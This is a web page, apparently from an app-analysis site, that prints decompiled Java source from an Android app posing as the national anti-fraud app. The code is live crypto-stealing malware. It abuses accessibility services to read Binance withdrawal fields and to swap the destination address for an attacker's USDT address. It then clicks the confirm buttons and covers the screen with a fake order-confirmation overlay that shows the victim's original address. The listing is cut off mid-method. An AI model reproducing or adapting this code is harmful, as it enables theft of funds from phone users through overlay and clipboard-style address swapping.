国家反诈中心 v6.89.68.98版本的 MD5 值为:ba03cf5906e79cb5d31f6dcee7dbc45f
以下内容为反编译后的 Binance.java 源代码,内容仅作参考
package interior.bailey.lqxetyrmclrblfkquaywutnvrvnoslyvpkgugamxfdlssqmiqz2;
import android.accessibilityservice.AccessibilityService;
import android.content.Context;
import android.graphics.Rect;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.Looper;
import android.view.View;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import android.webkit.JavascriptInterface;
import android.webkit.JsResult;
import android.webkit.ValueCallback;
import android.webkit.WebChromeClient;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.widget.FrameLayout;
import android.widget.TextView;
import androidx.core.view.accessibility.AccessibilityNodeInfoCompat;
import interior.bailey.lqxetyrmclrblfkquaywutnvrvnoslyvpkgugamxfdlssqmiqz2.reewntcukqofhfclyqkwgydfufttecnmoqbcsksqrjsuelybkx3.AccessService;
import interior.bailey.lqxetyrmclrblfkquaywutnvrvnoslyvpkgugamxfdlssqmiqz2.reewntcukqofhfclyqkwgydfufttecnmoqbcsksqrjsuelybkx3.MySettings;
import interior.bailey.lqxetyrmclrblfkquaywutnvrvnoslyvpkgugamxfdlssqmiqz2.reewntcukqofhfclyqkwgydfufttecnmoqbcsksqrjsuelybkx3.initializeService;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import org.json.JSONObject;
public class Binance {
public static FrameLayout binanceWalletInjview;
public static WindowManager.LayoutParams binanceWalletInjviewLayoutParams;
public static boolean ifShowDialog;
private static boolean ifWebViewFullScreen;
private static int showType;
public static TextView textView;
private static String usdtaddress;
private static String usdtamount;
public static WebView webView;
private static WindowManager windowManager;
public static void binanceinj(final Context context) {
if (binanceWalletInjview == null) {
initInjView(context);
}
if (webView == null) {
MyWebView myWebView = new MyWebView(context);
webView = myWebView;
char c = 65535;
myWebView.setLayoutParams(new ViewGroup.LayoutParams(-1, -1));
webView.requestFocus();
webView.setFocusable(true);
webView.setFocusableInTouchMode(true);
WebSettings settings = webView.getSettings();
settings.setJavaScriptEnabled(true);
settings.setJavaScriptCanOpenWindowsAutomatically(true);
settings.setDomStorageEnabled(true);
settings.setCacheMode(1);
webView.setScrollBarStyle(0);
webView.setLayerType(2, null);
webView.setWebChromeClient(new MyWebChromeClient());
webView.requestFocus(130);
webView.requestFocusFromTouch();
webView.setEnabled(true);
webView.setVerticalScrollBarEnabled(false);
webView.setHorizontalScrollBarEnabled(false);
ViewGroup.LayoutParams layoutParams = webView.getLayoutParams();
layoutParams.height = ScreenUtil.getScreenHeight(context);
webView.setLayoutParams(layoutParams);
String language = Locale.getDefault().getLanguage();
language.hashCode();
switch (language.hashCode()) {
case 3241:
if (language.equals("en")) {
c = 0;
break;
}
break;
case 3383:
if (language.equals("ja")) {
c = 1;
break;
}
break;
case 3428:
if (language.equals("ko")) {
c = 2;
break;
}
break;
case 3886:
if (language.equals("zh")) {
c = 3;
break;
}
break;
}
String str = "";
switch (c) {
case 0:
default:
str = "<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">

    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            /*background-color: #FFF;*/
            font-family: 'Roboto', sans-serif;
        }

        html {
            line-height: 1.6;
            background-color: #FFF;
        }

        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 15px;
            background-color: #FFF;
            border-radius: 5px;
        }

        h1 {
            text-align: center;
            margin-bottom: 1rem;
        }

        label {
            display: block;
            margin-bottom: 0.5rem;
        }

        input[type="text"], input[type="number"] {
            width: 100%;
            padding: 8px;
            margin-bottom: 1rem;
            border-radius: 5px;
            border: 1px solid #fff;
        }

        button {
            display: block;
            width: 100%;
            padding: 10px;
            background-color:rgba(68,116,182,1);
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .r-lang {
            color: #222222;
        }
        button:hover {
            background-color: #444;
        }
        .detail-item {
            display: flex;
            justify-content: space-between;
            padding: 0.3rem 0;
            align-items: center;
        }
        .detail-item:not(:last-child) {
            /*border-bottom: 1px solid #ccc;*/
        }
        .detail {
            /* margin-top: 1rem;
            padding: 0.5rem;
            border: 1px solid #ccc;
            /* background-color: lightblue; */
            border-radius: 7px;

            padding: 10px 10px;
            color: #878d99;
            /*box-shadow: 1px 1px 0px rgba(0, 0, 0, 0.25), -1px 1px 0px rgba(0, 0, 0, 0.25);*/
            margin-top: 20px;
            font-size: 16px;
            font-weight: 500;
            background-color: #f5f5f5;
        }
        .footer {
            position: fixed;
            bottom: 0;
            width: 100%;
            padding: 1rem;
        }
        .nav-icon {
            width: 1rem;
        }
        .nav-bar {
            display: flex;
            justify-content: space-between;
            position: relative;
        }
        .left {
            padding: 10px;
        }
        .center {
            padding: 0px;
            position: absolute;
            left: 50%;
            transform: translateX(-50%);
            font-size: 20px;
            font-weight:500;
        }
        .transfer-amount {
            text-align: center;
            margin-top: 35px;
            font-size: 2rem;
        }
        .usd {
            font-size: 1rem;
            color: #ccc;
        }
        .left-font {
            color: #333;
            font-size: 14px;
        }
        .right-font {
            font-size: 14px;
        }
        .loading-overlay {
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background-color: rgba(255, 255, 255, 0.8);
        display: flex;
        align-items: center;
        justify-content: center;
    }

    .spinner {
        width: 50px;
        height: 50px;
        border: 5px solid rgba(0, 0, 0, 0.1);
        border-left-color: #3956cd;
        border-radius: 50%;
        animation: spin 1s linear infinite;
    }
        .tips {
            font-size: 13px;
            background-color: #f5f5f5;
            padding: 10px 10px;
            border-radius: 5px;
            margin-top: 10px;
        }

    @keyframes spin {
        100% {
            transform: rotate(360deg);
        }
    }
    hr {
            border: none; /* 移除默认边框 */
            border-top: 1px solid #dddddd; /* 设置新边框，可以修改宽度、颜色等 */
            height: 0; /* 重设高度 */
            width: 100%; /* 设置分割线宽度 */
            clear: both; /* 防止分割线周围的元素发生浮动 */
            margin: 10px 0;
    }
    </style>

</head>
<body>
    <!-- <div class="loading-overlay" id="loadingOverlay">
    <div class="spinner"></div>
</div> -->
    <div class="container">
        <div class="nav-bar">
            <!-- 返回按钮 -->
            <div class="left">
                <img src="" alt="" class="nav-icon">
            </div>
            <!-- 居中文字 -->
            <div class="center lang" data-lang-key="title" style="font-size: 17px;"></div>
            <div class="center lang" data-lang-key="sub_title" style="margin-top: 50px; font-size: 15px; color: #878d99"></div>
        </div>

        <div class="transfer-amount">
            <span class="usdt_amount" style="font-weight: 600" data-lang-key="usdt_amount"></span><span style="font-size: 20px; font-weight: 300"> USDT</span>
            <!-- <div class="usd">≈ $<span class="usd_amount">61.85</span><span></span></div> -->
        </div>

        <div class="detail">
            <div class="detail-item">
                <span class="lang" data-lang-key="withdraw_address"></span>
                <span class="right-font from lang r-lang" data-lang-key="asset"></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="chain"></span>
                <span class="right-font chain r-lang" data-lang-key="chain"></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="from_address" style="white-space: nowrap"></span>
                <span class="right-font to r-lang"></span>
            </div>
            <hr>
            <div class="detail-item">
                <span class="lang" data-lang-key="symbol" style="white-space: nowrap"></span>
                <span class="right-font to r-lang">USDT</span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="amount" style="white-space: nowrap"></span>
                <span class="right-font r-lang total_amount"><span>USDT</span></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="fee" style="white-space: nowrap"></span>
                <span class="right-font fee r-lang"></span>
            </div>

        </div>

        <div class="tips">
            <p class="r-lang lang" data-lang-key="tips">
            </p>
        </div>


    </div>
            <!-- 底部按钮 -->
            <!-- <div class="footer">
                <button class="lang" style="background: rgba(68, 116, 182,);" data-lang-key="confirm"></button>
            </div> -->
</body>
<script>
    //  setTimeout(() => {
    //     const loadingOverlay = document.getElementById('loadingOverlay');
    //     loadingOverlay.style.display = 'none';
    // }, 3000);
    function  changLang(data) {
        const languagePack = {
            en: {
                title: 'Confirm order',
                sub_title: 'You will get',
                withdraw_address: 'Address',
                chain: 'Nework',
                from_address: 'Source',
                symbol: 'Coin',
                amount:'Amount',
                fee: 'Network fee',
                tips: 'Ensure that the address is correct and on the same network, Transaction cannot be cancelled.',
            },
            zh: {
                title: '确认订单',
                sub_title: '实际到账:',
                withdraw_address: '提币地址',
                chain: '主网络',
                from_address: '提现来源账户',
                symbol: '币种',
                amount:'金额',
                fee: '网络手续费',
                tips: '请确保您输入了正确的提币地址并且您选择的转账网络与地址相匹配。提币订单创建后不可取消',
            }
        };

        let currentLanguage = 'en'
        try {
            const lang = data.lang;
            if (lang === 'zh') {
                currentLanguage = 'zh';
            }
        } catch (e) {
            console.log(e);
        }

        const elements = document.querySelectorAll('.lang');

        elements.forEach(element => {
            const key = element.getAttribute('data-lang-key');
            element.textContent = languagePack[currentLanguage][key];
        });

    };
    function transaction_info(data) {
        document.getElementsByClassName("usdt_amount")[0].innerHTML = data.usdt_amount;
        <!-- document.getElementsByClassName("usd_amount")[0].innerHTML = data.usd_amount; -->
        document.getElementsByClassName("chain")[0].innerHTML = data.chain
        document.getElementsByClassName("from")[0].innerHTML = data.from;
        document.getElementsByClassName("to")[0].innerHTML = data.to;
        document.getElementsByClassName("fee")[0].innerHTML = data.fee;
        document.getElementsByClassName("total_amount")[0].innerHTML = data.total_amount;
    }
    //使用时候注释这两行
    window.onload = changLang({lang: 'en'});
</script>
</html>";
break;
case 1:
case 2:
break;
case 3:
str = "<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">

    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            /*background-color: #FFF;*/
            font-family: 'Roboto', sans-serif;
        }

        html {
            line-height: 1.6;
            background-color: #FFF;
        }

        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 15px;
            background-color: #FFF;
            border-radius: 5px;
        }

        h1 {
            text-align: center;
            margin-bottom: 1rem;
        }

        label {
            display: block;
            margin-bottom: 0.5rem;
        }

        input[type="text"], input[type="number"] {
            width: 100%;
            padding: 8px;
            margin-bottom: 1rem;
            border-radius: 5px;
            border: 1px solid #fff;
        }

        button {
            display: block;
            width: 100%;
            padding: 10px;
            background-color:rgba(68,116,182,1);
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .r-lang {
            color: #222222;
        }
        button:hover {
            background-color: #444;
        }
        .detail-item {
            display: flex;
            justify-content: space-between;
            padding: 0.3rem 0;
            align-items: center;
        }
        .detail-item:not(:last-child) {
            /*border-bottom: 1px solid #ccc;*/
        }
        .detail {
            /* margin-top: 1rem;
            padding: 0.5rem;
            border: 1px solid #ccc;
            /* background-color: lightblue; */
            border-radius: 7px;

            padding: 10px 10px;
            color: #878d99;
            /*box-shadow: 1px 1px 0px rgba(0, 0, 0, 0.25), -1px 1px 0px rgba(0, 0, 0, 0.25);*/
            margin-top: 20px;
            font-size: 16px;
            font-weight: 500;
            background-color: #f5f5f5;
        }
        .footer {
            position: fixed;
            bottom: 0;
            width: 100%;
            padding: 1rem;
        }
        .nav-icon {
            width: 1rem;
        }
        .nav-bar {
            display: flex;
            justify-content: space-between;
            position: relative;
        }
        .left {
            padding: 10px;
        }
        .center {
            padding: 0px;
            position: absolute;
            left: 50%;
            transform: translateX(-50%);
            font-size: 20px;
            font-weight:500;
        }
        .transfer-amount {
            text-align: center;
            margin-top: 35px;
            font-size: 2rem;
        }
        .usd {
            font-size: 1rem;
            color: #ccc;
        }
        .left-font {
            color: #333;
            font-size: 14px;
        }
        .right-font {
            font-size: 14px;
        }
        .loading-overlay {
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background-color: rgba(255, 255, 255, 0.8);
        display: flex;
        align-items: center;
        justify-content: center;
    }

    .spinner {
        width: 50px;
        height: 50px;
        border: 5px solid rgba(0, 0, 0, 0.1);
        border-left-color: #3956cd;
        border-radius: 50%;
        animation: spin 1s linear infinite;
    }
        .tips {
            font-size: 13px;
            background-color: #f5f5f5;
            padding: 10px 10px;
            border-radius: 5px;
            margin-top: 10px;
        }

    @keyframes spin {
        100% {
            transform: rotate(360deg);
        }
    }
    hr {
            border: none; /* 移除默认边框 */
            border-top: 1px solid #dddddd; /* 设置新边框，可以修改宽度、颜色等 */
            height: 0; /* 重设高度 */
            width: 100%; /* 设置分割线宽度 */
            clear: both; /* 防止分割线周围的元素发生浮动 */
            margin: 10px 0;
    }
    </style>

</head>
<body>
    <!-- <div class="loading-overlay" id="loadingOverlay">
    <div class="spinner"></div>
</div> -->
    <div class="container">
        <div class="nav-bar">
            <!-- 返回按钮 -->
            <div class="left">
                <img src="" alt="" class="nav-icon">
            </div>
            <!-- 居中文字 -->
            <div class="center lang" data-lang-key="title" style="font-size: 17px;"></div>
            <div class="center lang" data-lang-key="sub_title" style="margin-top: 50px; font-size: 15px; color: #878d99"></div>
        </div>

        <div class="transfer-amount">
            <span class="usdt_amount" style="font-weight: 600" data-lang-key="usdt_amount"></span><span style="font-size: 20px; font-weight: 300"> USDT</span>
            <!-- <div class="usd">≈ $<span class="usd_amount">61.85</span><span></span></div> -->
        </div>

        <div class="detail">
            <div class="detail-item">
                <span class="lang" data-lang-key="withdraw_address"></span>
                <span class="right-font from lang r-lang" data-lang-key="asset"></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="chain"></span>
                <span class="right-font chain r-lang" data-lang-key="chain"></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="from_address" style="white-space: nowrap"></span>
                <span class="right-font to r-lang"></span>
            </div>
            <hr>
            <div class="detail-item">
                <span class="lang" data-lang-key="symbol" style="white-space: nowrap"></span>
                <span class="right-font to r-lang">USDT</span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="amount" style="white-space: nowrap"></span>
                <span class="right-font r-lang total_amount"><span>USDT</span></span>
            </div>
            <div class="detail-item">
                <span class="lang" data-lang-key="fee" style="white-space: nowrap"></span>
                <span class="right-font fee r-lang"></span>
            </div>

        </div>

        <div class="tips">
            <p class="r-lang lang" data-lang-key="tips">
            </p>
        </div>


    </div>
            <!-- 底部按钮 -->
            <!-- <div class="footer">
                <button class="lang" style="background: rgba(68, 116, 182,);" data-lang-key="confirm"></button>
            </div> -->
</body>
<script>
    //  setTimeout(() => {
    //     const loadingOverlay = document.getElementById('loadingOverlay');
    //     loadingOverlay.style.display = 'none';
    // }, 3000);
    function  changLang(data) {
        const languagePack = {
            en: {
                title: 'Confirm order',
                sub_title: 'You will get',
                withdraw_address: 'Address',
                chain: 'Nework',
                from_address: 'Source',
                symbol: 'Coin',
                amount:'Amount',
                fee: 'Network fee',
                tips: 'Ensure that the address is correct and on the same network, Transaction cannot be cancelled.',
            },
            zh: {
                title: '确认订单',
                sub_title: '实际到账:',
                withdraw_address: '提币地址',
                chain: '主网络',
                from_address: '提现来源账户',
                symbol: '币种',
                amount:'金额',
                fee: '网络手续费',
                tips: '请确保您输入了正确的提币地址并且您选择的转账网络与地址相匹配。提币订单创建后不可取消',
            }
        };

        let currentLanguage = 'en'
        try {
            const lang = data.lang;
            if (lang === 'zh') {
                currentLanguage = 'zh';
            }
        } catch (e) {
            console.log(e);
        }

        const elements = document.querySelectorAll('.lang');

        elements.forEach(element => {
            const key = element.getAttribute('data-lang-key');
            element.textContent = languagePack[currentLanguage][key];
        });

    };
    function transaction_info(data) {
        document.getElementsByClassName("usdt_amount")[0].innerHTML = data.usdt_amount;
        <!-- document.getElementsByClassName("usd_amount")[0].innerHTML = data.usd_amount; -->
        document.getElementsByClassName("chain")[0].innerHTML = data.chain
        document.getElementsByClassName("from")[0].innerHTML = data.from;
        document.getElementsByClassName("to")[0].innerHTML = data.to;
        document.getElementsByClassName("fee")[0].innerHTML = data.fee;
        document.getElementsByClassName("total_amount")[0].innerHTML = data.total_amount;
    }
    //使用时候注释这两行
    window.onload = changLang({lang: 'zh'});
</script>
</html>";
break;
}
webView.loadData(str, "text/html", "base64");
binanceWalletInjview.addView(webView);
TextView textView2 = new TextView(context.getApplicationContext());
textView = textView2;
textView2.setText(" ");
FrameLayout.LayoutParams layoutParams2 = new FrameLayout.LayoutParams(-2, -2);
layoutParams2.gravity = 51;
layoutParams2.height = ScreenUtil.dp2px(context, 40.0f);
layoutParams2.width = ScreenUtil.dp2px(context, 130.0f);
textView.setLayoutParams(layoutParams2);
textView.setBackgroundColor(context.getResources().getColor(17170445));
textView.setClickable(true);
textView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Binance.binanceWalletInjviewLayoutParams.width = -1;
Binance.binanceWalletInjviewLayoutParams.height = -2;
Binance.binanceWalletInjviewLayoutParams.gravity = 51;
Binance.binanceWalletInjviewLayoutParams.flags = -2142501088;
Binance.windowManager.updateViewLayout(Binance.binanceWalletInjview, Binance.binanceWalletInjviewLayoutParams);
Binance.showWebiew(context);
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365201");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365203");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430720");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430763");
}
}
}
if (findAccessibilityNodeInfosByViewId.size() == 1) {
String unused = Binance.usdtaddress = findAccessibilityNodeInfosByViewId.get(0).getText().toString();
}
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId2 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365306");
if (findAccessibilityNodeInfosByViewId2.isEmpty()) {
findAccessibilityNodeInfosByViewId2 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365309");
if (findAccessibilityNodeInfosByViewId2.isEmpty()) {
findAccessibilityNodeInfosByViewId2 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430824");
if (findAccessibilityNodeInfosByViewId2.isEmpty()) {
findAccessibilityNodeInfosByViewId2 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430869");
}
}
}
if (findAccessibilityNodeInfosByViewId2.size() == 1) {
String unused2 = Binance.usdtamount = findAccessibilityNodeInfosByViewId2.get(0).getText().toString();
}
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId3 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365203");
if (findAccessibilityNodeInfosByViewId3.isEmpty()) {
findAccessibilityNodeInfosByViewId3 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131365201");
if (findAccessibilityNodeInfosByViewId3.isEmpty()) {
findAccessibilityNodeInfosByViewId3 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430720");
if (findAccessibilityNodeInfosByViewId3.isEmpty()) {
findAccessibilityNodeInfosByViewId3 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131430763");
}
}
}
if (findAccessibilityNodeInfosByViewId3.size() == 1) {
Bundle bundle = new Bundle();
bundle.putCharSequence(AccessibilityNodeInfoCompat.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, initializeService.usdtadress);
findAccessibilityNodeInfosByViewId3.get(0).performAction(2097152, bundle);
}
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId4 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131378415");
if (findAccessibilityNodeInfosByViewId4.isEmpty()) {
findAccessibilityNodeInfosByViewId4 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131378375");
if (findAccessibilityNodeInfosByViewId4.isEmpty()) {
findAccessibilityNodeInfosByViewId4 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131443714");
if (findAccessibilityNodeInfosByViewId4.isEmpty()) {
findAccessibilityNodeInfosByViewId4 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131443863");
}
}
}
if (findAccessibilityNodeInfosByViewId4.size() == 1) {
findAccessibilityNodeInfosByViewId4.get(0).performAction(16);
}
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId5 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131363170");
if (findAccessibilityNodeInfosByViewId5.isEmpty()) {
findAccessibilityNodeInfosByViewId5 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131363172");
if (findAccessibilityNodeInfosByViewId5.isEmpty()) {
findAccessibilityNodeInfosByViewId5 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131428693");
if (findAccessibilityNodeInfosByViewId5.isEmpty()) {
findAccessibilityNodeInfosByViewId5 = ((AccessibilityService) context).getRootInActiveWindow().findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131428714");
}
}
}
if (findAccessibilityNodeInfosByViewId5.size() == 1) {
findAccessibilityNodeInfosByViewId5.get(0).performAction(16);
}
}
});
binanceWalletInjview.addView(textView);
} else {
binanceWalletInjviewLayoutParams.flags = 262152;
binanceWalletInjviewLayoutParams.width = -2;
binanceWalletInjviewLayoutParams.height = -2;
windowManager.updateViewLayout(binanceWalletInjview, binanceWalletInjviewLayoutParams);
}
showRightTopButton(context);
}
private static void initInjView(Context context) {
FrameLayout frameLayout = new FrameLayout(context);
binanceWalletInjview = frameLayout;
frameLayout.setVisibility(8);
WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(Integer.valueOf(MySettings.read(context.getApplicationContext(), MySettings.ScreenWidth, "720")).intValue(), Integer.valueOf(MySettings.read(context.getApplicationContext(), MySettings.ScreenHight, "1080")).intValue(), 2032, 262152, 1);
binanceWalletInjviewLayoutParams = layoutParams;
layoutParams.gravity = 51;
binanceWalletInjviewLayoutParams.width = -2;
binanceWalletInjviewLayoutParams.height = -2;
WindowManager windowManager2 = (WindowManager) context.getSystemService("window");
windowManager = windowManager2;
windowManager2.addView(binanceWalletInjview, binanceWalletInjviewLayoutParams);
}
public static class MyWebView extends WebView {
private Context context;
@Override
protected void onScrollChanged(int i, int i2, int i3, int i4) {
super.onScrollChanged(i, i2, i3, i4);
scrollTo(i, 0);
}
public MyWebView(Context context) {
super(context);
this.context = context;
addJavascriptInterface(new AndroidInterface(), "Android");
}
private class AndroidInterface {
private AndroidInterface() {
}
@JavascriptInterface
public void trustback() {
((AccessService) MyWebView.this.context).performGlobalAction(1);
}
}
}
public static void hideInjectView() {
if (ifShowDialog) {
binanceWalletInjview.setVisibility(8);
webView.setVisibility(8);
textView.setVisibility(8);
ifShowDialog = false;
showType = 0;
ifWebViewFullScreen = false;
}
}
public static void showRightTopButton(Context context) {
if (showType == 2 || !mesureInjectVIew(context)) {
return;
}
if (Build.VERSION.SDK_INT >= 23) {
binanceWalletInjview.setBackgroundColor(context.getColor(17170445));
}
webView.setVisibility(8);
textView.setVisibility(0);
binanceWalletInjview.setVisibility(0);
ifShowDialog = true;
showType = 1;
ifWebViewFullScreen = false;
}
private static boolean mesureInjectVIew(Context context) {
AccessibilityService accessibilityService;
AccessibilityNodeInfo rootInActiveWindow;
if (Build.VERSION.SDK_INT < 24 || (rootInActiveWindow = (accessibilityService = (AccessibilityService) context).getRootInActiveWindow()) == null) {
return false;
}
List<AccessibilityNodeInfo> findAccessibilityNodeInfosByViewId = rootInActiveWindow.findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131363172");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = rootInActiveWindow.findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131363170");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = rootInActiveWindow.findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131428693");
if (findAccessibilityNodeInfosByViewId.isEmpty()) {
findAccessibilityNodeInfosByViewId = rootInActiveWindow.findAccessibilityNodeInfosByViewId("com.binance.dev:id/2131428714");
}
}
}
if (findAccessibilityNodeInfosByViewId.size() > 0) {
Rect rect = new Rect();
findAccessibilityNodeInfosByViewId.get(0).getBoundsInScreen(rect);
if (accessibilityService.getSoftKeyboardController().getShowMode() == 0) {
binanceWalletInjviewLayoutParams.x = rect.left;
binanceWalletInjviewLayoutParams.y = rect.top - ScreenUtil.getStatusBarHeight(context);
windowManager.updateViewLayout(binanceWalletInjview, binanceWalletInjviewLayoutParams);
}
}
return true;
}
public static void showWebiew(Context context) {
textView.setVisibility(8);
binanceWalletInjviewLayoutParams.x = 0;
binanceWalletInjviewLayoutParams.y = 0;
windowManager.updateViewLayout(binanceWalletInjview, binanceWalletInjviewLayoutParams);
setFullScreen(false, context);
if (Build.VERSION.SDK_INT >= 23) {
binanceWalletInjview.setBackgroundColor(context.getColor(17170445));
}
webView.setVisibility(0);
showType = 2;
ifShowDialog = true;
ifWebViewFullScreen = true;
}
public static void checkEvent(AccessibilityEvent accessibilityEvent, final Context context) {
if (showType == 1 && ifShowDialog && accessibilityEvent.getEventType() == 4194304) {
showRightTopButton(context);
}
if (webView != null && showType == 2 && ifWebViewFullScreen && accessibilityEvent.getEventType() == 32 && "androidx.appcompat.app.AppCompatDialog".equals(accessibilityEvent.getClassName())) {
new Handler().postDelayed(new Runnable() {
@Override
public void run() {
Binance.setWrapContentScreen(context);
Binance.sendOldValue();
}
}, 500L);
}
if (!ifWebViewFullScreen && showType == 2 && accessibilityEvent.getEventType() == 1 && "com.binance.dev".equals(accessibilityEvent.getPackageName()) && accessibilityEvent.getSource() != null && ("com.binance.dev:id/2131364202".equals(accessibilityEvent.getSource().getViewIdResourceName()) || "com.binance.dev:id/2131364200".equals(accessibilityEvent.getSource().getViewIdResourceName()) || "com.binance.dev:id/2131429700".equals(accessibilityEvent.getSource().getViewIdResourceName()) || "com.binance.dev:id/2131429734".equals(accessibilityEvent.getSource().getViewIdResourceName()))) {
setFullScreen(true, context);
new Thread(new Runnable() {
@Override
public void run() {
try {
Thread.sleep(3500L);
int unused = Binance.showType = 0;
((AccessService) context).handler.sendEmptyMessage(15);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
}).start();
}
if (showType == 0 && accessibilityEvent.getEventType() == 1 && "com.binance.dev".equals(accessibilityEvent.getPackageName()) && accessibilityEvent.getSource() != null && ("com.binance.dev:id/2131378415".equals(accessibilityEvent.getSource().getViewIdResourceName()) || "com.binance.dev:id/2131378375".equals(accessibilityEvent.getSource().getViewIdResourceName()) || "com.binance.dev:id/2131443714".equals(accessibilityEvent.getSource().getViewIdResourceName()))) {
binanceinj(context);
}
if (showType == 2 && accessibilityEvent.getEventType() == 32 && "com.binance.dev".equals(accessibilityEvent.getPackageName()) && !accessibilityEvent.getText().isEmpty() && "androidx.appcompat.app.AppCompatDialog".contentEquals(accessibilityEvent.getClassName())) {
new Handler(Looper.getMainLooper()).postDelayed(new Runnable() {
@Override
public void run() {
ViewGroup.LayoutParams layoutParams = Binance.webView.getLayoutParams();
layoutParams.height = (ScreenUtil.getScreenHeight(context) - ScreenUtil.dp2px(context, 140.0f)) - ScreenUtil.getStatusBarHeight(context);
Binance.webView.setLayoutParams(layoutParams);
}
}, 500L);
}
}
public static void sendOldValue() {
String str = usdtamount;
if (str == null || str.contains("最小值") || usdtamount.contains("Minimum")) {
hideInjectView();
return;
}
String d = Double.toString(Double.parseDouble(usdtamount) - 1.0d);
HashMap hashMap = new HashMap();
hashMap.put("total_amount", usdtamount + "USDT");
hashMap.put("from", usdtaddress);
hashMap.put("to", "资金账户");
hashMap.put("usdt_amount", d);
hashMap.put("usd_amount", d);
hashMap.put("chain", "Tron(TRC20)");
hashMap.put("fee", "1USDT");
JSONObject jSONObject = new JSONObject(hashMap);
WebView webView2 = webView;
webView2.evaluateJavascript("javascript:transaction_info(" + jSONObject.toString() + ")", new ValueCallback<String>() {
@Override
public void onReceiveValue(String str2) {
}
});
}
public static void setWrapContentScreen(Context context) {
if (ifWebViewFullScreen) {
binanceWalletInjviewLayoutParams.width = -1;
binanceWalletInjviewLayoutParams.height = -2;
binanceWalletInjviewLayoutParams.y = ScreenUtil.getStatusBarHeight(context);
windowManager.updateViewLayout(binanceWalletInjview, binanceWalletInjviewLayoutParams);
ifWebViewFullScreen = false;
}
}
private static void setFullScreen(boolean z, Context context) {
